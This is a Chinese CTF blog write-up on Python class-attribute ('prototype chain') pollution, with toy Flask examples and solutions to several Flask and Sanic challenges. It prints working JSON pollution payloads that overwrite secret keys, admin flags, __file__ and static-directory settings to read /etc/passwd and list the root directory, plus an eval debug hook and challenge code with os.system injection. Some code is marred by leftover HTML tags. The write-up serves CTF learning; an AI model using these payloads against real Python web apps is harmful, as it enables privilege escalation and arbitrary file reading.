欢迎来到7N的个人博客!

浅谈python原型链污染–从原理到赛题实战


avatar
7ech_N3rd 2024-09-24 1.24k


往下滚,包没有上升负荷的

PY原型链污染基础原理

首先,我们了解一下Python中的类和实例的关系:

class Animal:
    species = "动物"

    def __init__(self, name):
        self.name = name

    def make_sound(self):
        print(f"{self.name} 发出声音")` 

这里,Animal 是一个类,species 是类变量,name 是实例变量。创建多个Animal实例:

dog = Animal("狗")
cat = Animal("猫")

dog.make_sound()  # 输出: 狗 发出声音
cat.make_sound()  # 输出: 猫 发出声音

print(dog.species)  # 输出: 动物
print(cat.species)  # 输出: 动物

在Python中,类变量是所有实例共享的。如果我们修改类变量,所有实例都会受到影响。这类似于JavaScript中修改原型链,影响所有继承自该原型的对象。

例如:

# 修改类变量
Animal.species = "哺乳动物"

print(dog.species)  # 输出: 哺乳动物
print(cat.species)  # 输出: 哺乳动物

换个思路要是这里的Animal类变成Config时,然后这个属性变成is_admin时,就能污染,把自己变成管理员了

# config.py

class Config:
    is_admin = False  # 默认用户不是管理员

    def set_config(cls, key, value):
        setattr(cls, key, value)

    def get_config(cls, key):
        return getattr(cls, key, None)

在这样的一个后端代码中:就会存在这种原型链污染:

from flask import Flask, request, jsonify
from config import Config

app = Flask(__name__)

@app.route('/update_config',</span> methods=['POST'])
def update_config():
    data = request.json
    for key, value in data.items():
        Config.set_config(key, value)
    return jsonify({"status": "success", "config": data})

@app.route('/check_admin',</span> methods=['GET'])
def check_admin():
    is_admin = Config.get_config('is_admin')
    return jsonify({"is_admin": is_admin})

if __name__ == '__main__':
    app.run(debug=True)

像是正常的请求就是这样:

POST /update_config
Content-Type: application/json

{
    "theme": "dark",
    "language": "en"
}

黑客的请求:

POST /update_config
Content-Type: application/json

{
    "is_admin": true
}

这样就能把自己设置为管理员了
不仅如此,攻击者还可以尝试修改其他关键属性或嵌套对象。例如:

POST /update_config
Content-Type: application/json

{
    "__class__": {
        "is_admin": true
    }
}

结合之前ssti的知识甚至向上穿越到globals全局变量从而修改其他的变量也是可行的。
接下从简单到难来看历年真题:

[GeekChallenge2023]ezpython

import json
import os

from waf import waf
import importlib
from flask import Flask,render_template,request,redirect,url_for,session,render_template_string

app = Flask(__name__)
app.secret_key='jjjjggggggreekchallenge202333333'
class User():
    def __init__(self):
        self.username=""
        self.password=""
        self.isvip=False

class hhh(User):
    def __init__(self):
        self.username=""
        self.password=""

registered_users=[]
@app.route('/')#CTL{n}def</span> hello_world():  # put application's code here
    return render_template("welcome.html")

@app.route('/play')#CTL{n}def</span> play():
    username=session.get('username')
    if username:
        return render_template('index.html',name=username)
    else:
        return redirect(url_for('login'))

@app.route('/login',methods=['GET','POST'])#CTL{n}def</span> login():
    if request.method == 'POST':
        username=request.form.get('username')
        password=request.form.get('password')
        user = next((user for user in registered_users if user.username == username and user.password == password), None)
        if user:
            session['username'] = user.username
            session['password']=user.password
            return redirect(url_for('play'))
        else:
            return "Invalid login"
        return redirect(url_for('play'))
    return render_template("login.html")

@app.route('/register',methods=['GET','POST'])#CTL{n}def</span> register():
    if request.method == 'POST':
        try:
            if waf(request.data):
                return "fuck payload!Hacker!!!"
            data=json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "连用户名密码都没有你注册啥呢"
            user=hhh()
            merge(data,user)
            registered_users.append(user)
        except Exception as e:
            return "泰酷辣,没有注册成功捏"
        return redirect(url_for('login'))
    else:
        return render_template("register.html")
@app.route('/flag',methods=['GET'])
def flag():
    user = next((user for user in registered_users if user.username ==session['username']  and user.password == session['password']), None)
    if user:
        if user.isvip:
            data=request.args.get('num')
            if data:
                if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <img src="{{url_for(\'static\',filename=\'weixin.png\')}}">要不v我50,我送你一个VIP吧,嘻嘻</p>')
    else:
        return "先登录去"

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

if __name__ == '__main__':
    app.run(host="0.0.0.0",port="8888")

merge函数很明显就是一个未对输入验证的漏洞点,结合上文的/register路由,使得User()类的isvip=True

实际情况有isvip过滤,所以就是用unicode绕过了

{"username":"222","password":"111","__class__" : {"__base__" : {"\u0069\u0073\u0076\u0069\u0070": "True"}}}

接下来的数字判断,直接利用python utf-8自带的编码转换绕过:?num=12345678?

[Track-ctf2024夏季赛]message-board

先看源码

from flask import (
    Flask,
    request,
    redirect,
    make_response,
    render_template,
)
import jwt
import json
import config
import hashlib

class manager(object):
    def __init__(self, secret_key) -> None:
        self.secret_key = secret_key

def check(token, secret_key):
    try:
        payload = jwt.decode(token, secret_key, algorithms=["HS256"])
        return {"payload": payload}
    except jwt.ExpiredSignatureError:
        return {"error": "JWT已过期"}
    except jwt.InvalidTokenError:
        return {"error": "无效的JWT"}
def md5_hash(data):
    md5 = hashlib.md5()
    md5.update(data.encode("utf-8"))
    encrypted_data = md5.hexdigest()
    return encrypted_data

app = Flask(__name__)
app_manager = manager(config.secret_key)
setattr(app_manager, "admin", config.flag)
user_table = {"admin": "665a3aaad65af127f739547912f38582"}
@app.route("/")
def index():
    """主页"""
    check_result = check(request.cookies.get("json_web_token"), app_manager.secret_key)
    if 'payload' in check_result:
        return redirect("/message")
    return redirect("/login")

@app.route("/reg", methods=["GET", "POST"])
def reg():
    """注册接口"""
    if request.method == "GET":
        return render_template("register.html")
    # for post
    username = request.form.get("username")
    password = request.form.get("password")
    if username:
        if username not in user_table:
            setattr(app_manager, username, 'nothing here...')
            user_table[username] = md5_hash(password)
            return redirect("/login")
        return "用户已存在"
    return "用户名不能为空"

<span class="label label-primary">@app.route(</span>"/login", methods=["GET", "POST"])
def login():
    """登录接口"""
    if request.method == "GET":
        return render_template("login.html")
    # for post
    username = request.form.get("username")
    password = request.form.get("password")
    if username in user_table and md5_hash(password) == user_table[username]:
        token = {"username": username}
        resq = make_response(redirect("/message"))
        resq.set_cookie(
            "json_web_token",
            jwt.encode(token, app_manager.secret_key),
        )
        return resq
    return "login faild"

@app.route("/profile", methods=["POST"])
def profile():
    """留言提交接口"""
    check_result = check(request.cookies.get("json_web_token"), app_manager.secret_key)
    if "payload" in check_result:
        payload = check_result["payload"]
        username = payload["username"]
        data = request.form.get("data")
        setattr(app_manager, username, data)
        return redirect("/message")
    else:
        return json.dumps(check_result)

@app.route("/message")
def message():
    """查看用户留言的接口"""
    check_result = check(request.cookies.get("json_web_token"), app_manager.secret_key)
    if "payload" in check_result:
        payload = check_result["payload"]
        username = payload["username"]
        data = getattr(app_manager, username)
        return render_template("message.html", username=username, data=data)
    return redirect("/")

if __name__ == "__main__":
    app.run("0.0.0.0", 80)


结合这两部分就可以知道只要登录成admin就能拿flag。
然后看:


嗯,是通过jwttoken鉴权的,但是不知道
,所以不能伪造
但是在结合这两处代码?


我们是可以控制这个setattr函数传参的啊!要是能覆盖secret_key,不就能实现伪造登录了吗?

username=secret_key

就能覆写成功了


伪造成功,出了

[2024国赛]sanic

开局访问/src获得代码:

from sanic import Sanic
from sanic.response import text, html
from sanic_session import Session
import pydash
# pydash==5.1.2

class Pollute:
    def __init__(self):
        pass

app = Sanic(__name__)
app.static("/static/", "./static/")
Session(app)

@app.route('/', methods=['GET', 'POST'])
async def index(request):
    return html(open('static/index.html').read())

@app.route("/login")
async def login(request):
    user = request.cookies.get("user")
    if user.lower() == 'adm;n':
        request.ctx.session['admin'] = True
        return text("login success")

    return text("login fail")

@app.route("/src")
async def src(request):
    return text(open(__file__).read())

@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
    if request.ctx.session.get('admin') == True:
        key = request.json['key']
        value = request.json['value']
        if key and value and type(key) is str and '_.' not in key:
            pollute = Pollute()
            pydash.set_(pollute, key, value)
            return text("success")
        else:
            return text("forbidden")

    return text("forbidden")

if __name__ == '__main__':
    app.run(host='0.0.0.0')

限制绕过

直接利用\绕过

GET /login HTTP/1.1
Host: f6d1ee1c-4a28-457c-8da4-6024509aacf0.challenge.ctf.show
Cache-Control: max-age=0
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: user="adm73n"
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

登录后发现过滤了_.不过可以故技重施,\\\\绕过

原型链污染

污染__file__

首先的想法是污染__file__,这样在访问/src时候就能成功读取任意文件,获取file的前一步肯定是要获取globals

{"key":".__init__\\\\.__globals__\\\\.__file__","value": "/etc/passwd"}


但是污染为/flag就读不到

如何解决?

污染app.static

要是能够将目录污染为/,那就可以读取任意文件

分析一下:


来看注释:

 """Register a root to serve files from. The input can either be a file or a directory.

        This method provides an easy and simple way to set up the route necessary to serve static files.

        Args:
            uri (str): URL path to be used for serving static content.
            file_or_directory (Union[PathLike, str]): Path to the static file
                or directory with static files.
            pattern (str, optional): Regex pattern identifying the valid
                static files. Defaults to r"/?.+".
            use_modified_since (bool, optional): If true, send file modified
                time, and return not modified if the browser's matches the
                server's. Defaults to True.
            use_content_range (bool, optional): If true, process header for
                range requests and sends  the file part that is requested.
                Defaults to False.
            stream_large_files (Union[bool, int], optional): If True, use
                the StreamingHTTPResponse.file_stream handler rather than
                the HTTPResponse.file handler to send the file. If this
                is an integer, it represents the threshold size to switch
                to StreamingHTTPResponse.file_stream. Defaults to False,
                which means that the response will not be streamed.
            name (str, optional): User-defined name used for url_for.
                Defaults to "static".
            host (Optional[str], optional): Host IP or FQDN for the
                service to use.
            strict_slashes (Optional[bool], optional): Instruct Sanic to
                check if the request URLs need to terminate with a slash.
            content_type (Optional[str], optional): User-defined content type
                for header.
            apply (bool, optional): If true, will register the route
                immediately. Defaults to True.
            resource_type (Optional[str], optional): Explicitly declare a
                resource to be a "file" or a "dir".
            index (Optional[Union[str, Sequence[str]]], optional): When
                exposing against a directory, index is  the name that will
                be served as the default file. When multiple file names are
                passed, then they will be tried in order.
            directory_view (bool, optional): Whether to fallback to showing
                the directory viewer when exposing a directory. Defaults
                to False.
            directory_handler (Optional[DirectoryHandler], optional): An
                instance of DirectoryHandler that can be used for explicitly
                controlling and subclassing the behavior of the default
                directory handler.

        Returns:
            List[sanic.router.Route]: Routes registered on the router.

        Examples:
            Serving a single file:
            ```python
            app.static('/foo', 'path/to/static/file.txt')
            ```

            Serving all files from a directory:
            ```python
            app.static('/static', 'path/to/static/directory')
            ```

            Serving large files with a specific threshold:
            ```python
            app.static('/static', 'path/to/large/files', stream_large_files=1000000)
            ```
        """

翻译一下:

注册一个根路径来提供文件服务。输入可以是文件或目录。

这种方法提供了一种简单易行的方式来设置提供静态文件所需的路由。

参数:
uri (字符串): 用于提供静态内容的URL路径。
file_or_directory (Union[PathLike, str]): 静态文件的路径或包含静态文件的目录。
pattern (字符串, 可选): 识别有效静态文件的正则表达式模式。默认为r"/?.+"。
use_modified_since (布尔值, 可选): 如果为真,发送文件修改时间,并在浏览器的匹配服务器的情况下返回未修改。默认为True。
use_content_range (布尔值, 可选): 如果为真,处理范围请求的头部并发送请求的文件部分。默认为False。
stream_large_files (Union[布尔值, int], 可选): 如果为True,使用StreamingHTTPResponse.file_stream处理程序而不是HTTPResponse.file处理程序发送文件。如果这是一个整数,它表示切换到StreamingHTTPResponse.file_stream的阈值大小。默认为False,这意味着响应将不会被流式传输。
name (字符串, 可选): 用于url_for的用户定义名称。默认为"static"。
host (Optional[str], 可选): 服务使用的主机IP或FQDN。
strict_slashes (Optional[bool], 可选): 指示Sanic检查请求URL是否需要以斜杠结束。
content_type (Optional[str], 可选): 用户定义的头部内容类型。
apply (bool, 可选): 如果为真,将立即注册路由。默认为True。
resource_type (Optional[str], 可选): 明确声明一个资源为"file"或"dir"。
index (Optional[Union[str, Sequence[str]]], 可选): 当针对目录进行公开时,索引是将作为默认文件提供的名称。当传递多个文件名时,它们将按顺序尝试。
directory_view (bool, 可选): 是否在公开目录时回退到显示目录查看器。默认为False。
directory_handler (Optional[DirectoryHandler], 可选): DirectoryHandler的实例,可以用于明确控制和子类化默认目录处理器的行为。

关键是这个:

跟进去看看:

static.py:

Diretory


把这两个

directory_handler.directory_view ->true directory_handler.diectory->"/"就行了:

开始调试,稍稍修改一下代码:

from sanic import Sanic
from sanic.response import text, html
from sanic_session import Session
import sys
import pydash
# pydash==5.1.2

class Pollute:
    def __init__(self):
        pass

app = Sanic(__name__)
app.static("/static/", "./static/")
Session(app)

@app.route('/', methods=['GET', 'POST'])
async def index(request):
    return html(open('static/index.html').read())

@app.route("/login")
async def login(request):
    user = request.cookies.get("user")
    if user.lower() == 'adm;n':
        request.ctx.session['admin'] = True
        return text("login success")

    return text("login fail")

@app.route("/src")
async def src(request):
    eval(request.args.get('7n'))
    return text(open(__file__).read())

@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
    key = request.json['key']
    value = request.json['value']
    if key and value and type(key) is str and '_.' not in key:
        pollute = Pollute()
        pydash.set_(pollute, key, value)
        return text("success")
    else:
        return text("forbidden")

#print(app.router.name_index['name'].directory_view)

if __name__ == '__main__':
    app.run(host='0.0.0.0')

构造payload

找到这个链子,污染成True:

    #开启列目录功能
    {"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view","value": true}
    #将目录设置在根目录下{"key":"__clas`s__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts","value": ["/"]}


发现/目录下的flag:

{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.__file__","value": "/24bcbd0192e591d6ded1_flag"}

出了

参考文献

https://www.cnblogs.com/gxngxngxn/p/18205235

https://err0r233.github.io/posts/26055.html

[DASCTF暑期挑战赛2024]Sanic's revenge

很明显是修改自国赛

先看代码:

async def POLLUTE(request):
    key = request.json['key']
    value = request.json['value']
    if key and value and type(key) is str and 'parts' not in key and 'proc' not in str(value) and type(value) is not list:
        pollute = Pollute()
        pydash.set_(pollute, key, value)
        return text("success")
    else:
        log_dir = create_log_dir(6)
        log_dir_bak = log_dir + ".."
        log_file = "/tmp/" + log_dir + "/access.log"
        log_file_bak = "/tmp/" + log_dir_bak + "/access.log.bak"
        log = 'key: ' + str(key) + '|' + 'value: ' + str(value);
        # 生成日志文件
        os.system("mkdir /tmp/" + log_dir)
        with open(log_file, 'w') as f:
            f.write(log)
        # 备份日志文件
        os.system("mkdir /tmp/" + log_dir_bak)
        with open(log_file_bak, 'w') as f:
            f.write(log)
        return text("!!!此地禁止胡来,你的非法操作已经被记录!!!")

做到一半直接感觉不对劲,感觉是gxngxngxn师傅出的题目,结果还真是

在读他博客的过程中看到了这个:

https://www.cnblogs.com/gxngxngxn/p/18205235

这个

{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory","value": "/"}

然后就直接上访问/static/app/app.py得到全部源码:

from sanic import Sanic
import os
from sanic.response import text, html
import sys
import random
import pydash

class Pollute:
    def __init__(self):
        pass

def create_log_dir(n):
    ret = ""
    for i in range(n):
        num = random.randint(0, 9)
        letter = chr(random.randint(97, 122))
        Letter = chr(random.randint(65, 90))
        s = str(random.choice([num, letter, Letter]))
        ret += s
    return ret

app = Sanic(__name__)
app.static("/static/", "./static/")

@app.route("/Wa58a1qEQ59857qQRPPQ")
async def secret(request):
    with open("/h111int", 'r') as f:
        hint = f.read()
    return text(hint)

@app.route('/', methods=['GET', 'POST'])
async def index(request):
    return html(open('static/index.html').read())

@app.route("/adminLook", methods=['GET'])
async def AdminLook(request):
    # 方便管理员查看非法日志
    log_dir = os.popen('dir').read();
    return text(log_dir)

#__file__
@app.route("/pollute", methods=['GET', 'POST'])
async def POLLUTE(request):
    key = request.json['key']
    value = request.json['value']
    if key and value and type(key) is str and 'parts' not in key and 'proc' not in str(value) and type(
            value) is not list:
        pollute = Pollute()
        pydash.set_(pollute, key, value)
        return text("success")
    else:
        log_dir = create_log_dir(6)
        log_dir_bak = log_dir + ".."
        log_file = "/tmp/" + log_dir + "/access.log"
        log_file_bak = "/tmp/" + log_dir_bak + "/access.log.bak"
        log = 'key: ' + str(key) + '|' + 'value: ' + str(value);
        # 生成日志文件
        os.system("mkdir /tmp/" + log_dir)
        with open(log_file, 'w') as f:
            f.write(log)
        # 备份日志文件
        os.system("mkdir /tmp/" + log_dir_bak)
        with open(log_file_bak, 'w') as f:
            f.write(log)
        return text("!!!此地禁止胡来,你的非法操作已经被记录!!!")

if __name__ == '__main__':
    app.run(host='0.0.0.0',port=8888)

然后h1nt说flag在/app下随机命名,于是我们就需要列目录的功能了,当时主要想的是过防火墙,没出接下来看看赛后复现:

https://www.cnblogs.com/gxngxngxn/p/18290489

调试:

先去directory_handler看看有啥

正确思路跟国赛一样,通过directionary_view方法来实现目录查看的功能。但是我们需要进一步深入directionary_view这个功能

class DirectoryHandler:
......

async def handle(self, request: Request, path: str):
....
    current = path.strip("/")[len(self.base) :].strip("/")
    for file_name in self.index:
        index_file = self.directory / current / file_name
        if index_file.is_file():
            return await file(index_file)

    if self.directory_view:
        return self._index(
            self.directory / current, path, request.app.debug
        )
....        
def _index(self, location: Path, path: str, debug: bool):
    # Remove empty path elements, append slash
    if "//" in path or not path.endswith("/"):
        return redirect(
            "/" + "".join([f"{p}/" for p in path.split("/") if p])
        )

    # Render file browser
    page = DirectoryPage(self._iter_files(location), path, debug)#这里就是在列出文件了
    return html(page.render())

可以看到先有base处理得到current,(self.directory / current)一起作为location参数传入了DirectoryPage 于是我们主要能够污染self.base就行了

PS:真难猜啊,这个/的拼接用法只有在Pathlib中的WindowsPath才可以这么用

但是这还没完:

current = path.strip("/")[len(self.base) :].strip("/")
# http://127.0.0.1:8888/static/ Path='/static/'
# http://127.0.0.1:8888/static/aaa Path='/static/aaa'

这里的path为用户的路由:

试想一下:如果让path为aa..,污染len(self.base)==2就能让current为.. 从而触发目录穿越操作呢?

不行,还有限制:只有在访问到/static/下才能触发directionary_view操作,而且我们也不知道/static下有那些目录,这该咋办?

这时候之前的操作就派上用场了

如果我们把static目录设置到/下,然后就能肯定存在/etc bin之类的目录,就能直接实现目录穿越了

于是构造Payload:

允许目录显示:

把static目录设置到根目录:
```json
{"key":"<strong>class</strong>\\.<strong>init</strong>\\.<strong>globals</strong>\\.app.router.name_index.__mp_main__\.static.handler.keywords.file_or_directory","value": "/"}</p>
<pre><code>截取合适的
```json
current{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.base","value": "aaaaaaaaaa"}#(len('static/etc'0)=)10个a`

访问/static/etc../就看到了flag的名字
最后读取用上面办法读取就出了

暂无评论

发表评论